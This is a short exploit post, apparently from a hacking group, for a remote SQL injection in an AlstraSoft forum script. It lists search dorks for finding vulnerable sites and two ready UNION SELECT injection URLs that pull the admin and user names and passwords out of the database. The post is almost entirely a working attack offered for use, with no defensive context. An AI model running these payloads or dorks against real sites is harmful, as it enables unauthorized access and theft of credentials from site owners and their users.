Kod:
TurkHackTeam
################################################################
# ßy_kukunber-TurkHack01-se-zer-DelPhoİ - TurkHackTeam members ---#
################################################################
#
# Author: ßy_kukunber
#
# Home :www.turkhackteam.net/org ################################################################
#
# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability
# Dork: inurl:index.php?menu=showcat=
# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
# POC: For Admin id and pass
#
index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3
+from+admin--
#
# P0C-2: For Users id and pass
#
index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass
),3+from+users+limit+2,1--

